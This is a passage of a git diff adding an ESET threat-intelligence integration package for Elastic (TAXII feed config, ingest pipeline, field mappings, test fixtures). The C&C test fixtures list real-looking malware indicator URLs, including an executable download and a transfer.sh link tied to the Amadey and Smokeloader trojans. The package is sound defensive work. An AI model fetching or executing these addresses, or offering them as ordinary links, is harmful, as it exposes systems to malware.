"2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--0be0952c-3056-4220-9c31-c9b7a32a5d2c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--0be0952c-3056-4220-9c31-c9b7a32a5d2c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza/sus.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/sus.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:10:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a24fc10b-803e-4804-a5b3-82719a13cacc", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--a24fc10b-803e-4804-a5b3-82719a13cacc\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:09.000Z\", \"modified\": \"2023-10-15T02:10:09.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='https://beelowers.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:09Z\", \"valid_until\": \"2023-10-17T02:10:09Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:10:09.000Z", + "modified_at": "2023-10-15T02:10:09.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "https://beelowers.com" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:10:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--595b7750-06b6-4c8d-bf0d-0708081ba7af", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--595b7750-06b6-4c8d-bf0d-0708081ba7af\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:09.000Z\", \"modified\": \"2023-10-15T02:10:09.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/Smokeloader.H trojan\", \"pattern\": \"[url:value='https://transfer.sh/get/QaPzxFmFQh']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:09Z\", \"valid_until\": \"2023-10-17T02:10:09Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/Smokeloader.H trojan", + "last_seen": "2023-10-15T02:10:09.000Z", + "modified_at": "2023-10-15T02:10:09.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "https://transfer.sh/get/QaPzxFmFQh" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:10:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c2c4c382-6eb3-4577-947d-2769c29bb1fa", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--c2c4c382-6eb3-4577-947d-2769c29bb1fa\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:09.000Z\", \"modified\": \"2023-10-15T02:10:09.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://mikolyda.beget.tech/385119']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:09Z\", \"valid_until\": \"2023-10-17T02:10:09Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:10:09.000Z", + "modified_at": "2023-10-15T02:10:09.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://mikolyda.beget.tech/385119" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/cc/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/cc/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..01711e14fa8 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_eset/data_stream/cc/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/cc/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/cc/agent/stream/httpjson.yml.hbs @@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/cc/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/cc/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..459c9fffc4e --- /dev/null +++ b/packages/ti_eset/data_stream/cc/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "7d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/cc/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/cc/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..4888a266b87 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,148 @@ +--- +description: Pipeline for processing C&C collection feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET Botnet C&C stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - date: + field: eti.valid_until + target_field: eset.valid_until + formats: + - "ISO8601" + if: "ctx.eti?.valid_until != null" + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + - rename: + field: eti.description + target_field: threat.indicator.description + ignore_missing: true + - foreach: + field: eti.labels + processor: + append: + field: eset.labels + value: "{{_ingest._value}}" + ignore_missing: true + ignore_failure: true + if: ctx.eti?.labels != null + - script: + lang: painless + params: + "benign": 'Low' + "malicious-activity": 'High' + "phishing-activity": 'High' + "unwanted-activity": 'Medium' + if: ctx.eset?.labels != null + source: > + for (def label : ctx.eset.labels) { + if (params.containsKey(label)) { + ctx.threat.indicator.confidence = params.get(label); + break; + } + } + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' OR ' + ignore_missing: true + - foreach: + field: eti._patterns + if: "ctx.eti?._patterns != null" + processor: + grok: + field: _ingest._value + patterns: + - "^\\[url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?" + ignore_failure: true + - set: + field: threat.indicator.type + value: url + - set: + field: threat.indicator.name + copy_from: eti.name + if: "ctx.eti?.name != null" + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_eset/data_stream/cc/fields/agent.yml b/packages/ti_eset/data_stream/cc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/data_stream/cc/fields/base-fields.yml b/packages/ti_eset/data_stream/cc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/cc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/cc/fields/ecs.yml b/packages/ti_eset/data_stream/cc/fields/ecs.yml new file mode 100644 index 00000000000..d3f9633c4c9 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/fields/ecs.yml @@ -0,0 +1,36 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/data_stream/cc/fields/fields.yml b/packages/ti_eset/data_stream/cc/fields/fields.yml new file mode 100644 index 00000000000..bf7e7383df2 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/fields/fields.yml @@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/cc/lifecycle.yml b/packages/ti_eset/data_stream/cc/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/cc/manifest.yml b/packages/ti_eset/data_stream/cc/manifest.yml new file mode 100644 index 00000000000..035c14251c5 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/manifest.yml @@ -0,0 +1,95 @@ +title: "Botnet C&C" +type: logs +ilm_policy: logs-ti_eset.cc-default_policy +streams: + - input: httpjson + title: "Botnet C&C" + description: Collect data from ETI Botnet C&C feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of C&C collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-cc + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/cc/sample_event.json b/packages/ti_eset/data_stream/cc/sample_event.json new file mode 100644 index 00000000000..93ec62905b3 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/sample_event.json @@ -0,0 +1,69 @@ +{ + "@timestamp": "2023-10-19T02:00:09.000Z", + "agent": { + "ephemeral_id": "f8b54ae9-959e-4ef4-b706-1bea093aaf7e", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.cc", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:19:06.534Z", + "dataset": "ti_eset.cc", + "ingested": "2024-03-27T14:19:18Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:09.000Z\",\"description\":\"C\\u0026C of Win32/Smokeloader.H trojan\",\"id\":\"indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:09.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:09Z\",\"valid_until\":\"2023-10-21T02:00:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-cc" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/Smokeloader.H trojan", + "last_seen": "2023-10-19T02:00:09.000Z", + "modified_at": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://example.com/some/path" + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..4462fad8177 --- /dev/null +++ b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log @@ -0,0 +1,3 @@ +{"id": "indicator--edf8f990-9172-408c-96da-c33f6111fd5d", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:14.000Z", "modified": "2023-10-15T02:05:14.000Z", "name": "example.com", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[domain-name:value='example.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:14Z", "valid_until": "2023-10-17T02:05:14Z", "labels": ["benign"]} +{"id": "indicator--b86350c9-c69b-4ef7-8994-8b0bb9b74d3e", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:14.000Z", "modified": "2023-10-15T02:05:14.000Z", "name": "example.com", "description": "Host actively distributes high-severity threat in the form of malicious code.", "pattern": "[domain-name:value='example.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:14Z", "valid_until": "2023-10-17T02:05:14Z", "labels": ["malicious-activity"]} +{"id": "indicator--96a62da3-f84e-480c-89ab-8191e69fdbde", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:14.000Z", "modified": "2023-10-15T02:05:14.000Z", "name": "example.com", "description": "Host is known source of active fraudulent content.", "pattern": "[domain-name:value='example.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:14Z", "valid_until": "2023-10-17T02:05:14Z", "labels": ["unwanted-activity"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..cab9495a20d --- /dev/null +++ b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log-expected.json @@ -0,0 +1,136 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:05:14.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--edf8f990-9172-408c-96da-c33f6111fd5d", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:14.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--edf8f990-9172-408c-96da-c33f6111fd5d\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:14.000Z\", \"modified\": \"2023-10-15T02:05:14.000Z\", \"name\": \"example.com\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[domain-name:value='example.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:14Z\", \"valid_until\": \"2023-10-17T02:05:14Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:14.000Z", + "modified_at": "2023-10-15T02:05:14.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:14.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--b86350c9-c69b-4ef7-8994-8b0bb9b74d3e", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:14.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--b86350c9-c69b-4ef7-8994-8b0bb9b74d3e\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:14.000Z\", \"modified\": \"2023-10-15T02:05:14.000Z\", \"name\": \"example.com\", \"description\": \"Host actively distributes high-severity threat in the form of malicious code.\", \"pattern\": \"[domain-name:value='example.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:14Z\", \"valid_until\": \"2023-10-17T02:05:14Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of malicious code.", + "last_seen": "2023-10-15T02:05:14.000Z", + "modified_at": "2023-10-15T02:05:14.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:14.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--96a62da3-f84e-480c-89ab-8191e69fdbde", + "labels": [ + "unwanted-activity" + ], + "valid_until": "2023-10-17T02:05:14.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--96a62da3-f84e-480c-89ab-8191e69fdbde\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:14.000Z\", \"modified\": \"2023-10-15T02:05:14.000Z\", \"name\": \"example.com\", \"description\": \"Host is known source of active fraudulent content.\", \"pattern\": \"[domain-name:value='example.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:14Z\", \"valid_until\": \"2023-10-17T02:05:14Z\", \"labels\": [\"unwanted-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "Medium", + "description": "Host is known source of active fraudulent content.", + "last_seen": "2023-10-15T02:05:14.000Z", + "modified_at": "2023-10-15T02:05:14.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/domains/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/domains/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..69f3d66bf55 --- /dev/null +++ 